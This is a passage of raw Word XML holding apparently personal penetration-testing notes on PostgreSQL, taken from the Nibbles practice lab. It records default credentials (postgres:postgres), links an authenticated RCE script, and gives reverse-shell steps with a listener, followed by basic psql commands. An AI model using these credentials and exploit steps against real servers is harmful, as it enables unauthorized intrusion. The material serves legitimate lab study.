        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nibbles</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A7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId543">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/netbiosX/Default-Credentials/blob/master/PostgreSQL-Default-Password-List.md</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Nibbles,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> postgres:postgres</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A7E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connecting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="916"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psql -h &lt;host&gt; -p &lt;port&gt; -U &lt;username&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="916"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also specify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d &lt;database&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but it will default to the username if you don't specify </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A82">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l1jq28ltbswq" w:id="219"/>
      <w:bookmarkEnd w:id="219"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Shell from PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In Nibbles PG Practice, after logging in as postgres:postgres, we saw that we were running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 11.7 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">so we searched up "Postgresql 11.7 reverse shell" and found this github page. If you look at other searches, it seems like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 9.3-11.7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is vulnerable to authenticated RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1373"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId544">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/squid22/PostgreSQL_RCE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1373"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We git clone the script onto our Kali machine, we open it in Vim and modify the local and remote IP/port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1373"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We setup a penelope listener on port 80 on our Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1373"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We type the following command to execute the RCE script and receive a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1373"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 postgresql_rce.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1373"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we get foothold</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A8B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jlatb2cxre0l" w:id="220"/>
      <w:bookmarkEnd w:id="220"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A8D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A8E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Navigation in psql</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once connected, you can use these basic commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. See Available Databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This lists all databases on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Switch to a Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="737"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\c &lt;database_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A97">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. List Tables in the Current Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="982"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\dt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="982"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows all tables in the current database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A9A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A9B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. View Columns in a Table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1474"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\d &lt;table_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1474"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This lists all columns, their data types, and constraints for the users table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Exit the psql Tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="753"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Querying Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA5">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: Make sure to include the semicolon ";" at the end of each command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA6">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once connected to a database, you can run SQL queries. Here are some common examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. View All Rows in a Table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1318"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM &lt;table_name&gt;;</w:t>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t xml:space="preserve">2. Limit the Number of Results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="590"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM &lt;table_name&gt; LIMIT 5;</w:t>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t xml:space="preserve">3. Search for Specific Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
